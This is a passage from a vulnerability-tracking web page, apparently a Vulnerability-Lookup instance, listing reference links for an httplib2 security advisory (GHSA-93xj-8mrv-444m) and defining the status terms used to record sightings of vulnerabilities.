"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { type: "WEB", url: "https://github.com/httplib2/httplib2/pull/182", }, { type: "ADVISORY", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { type: "PACKAGE", url: "https://pypi.org/project/httplib2", }, ], }
Log in or create an account to share your comment.
Security Advisory comment format.
This schema specifies the format of a comment related to a security advisory.
UUIDv4 of the comment
UUIDv4 of the Vulnerability-Lookup instance
When the comment was created originally
When the comment was last updated
Title of the comment
Description of the comment
The identifier of the vulnerability (CVE ID, GHSA-ID, PYSEC ID, etc.).
Loading…
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.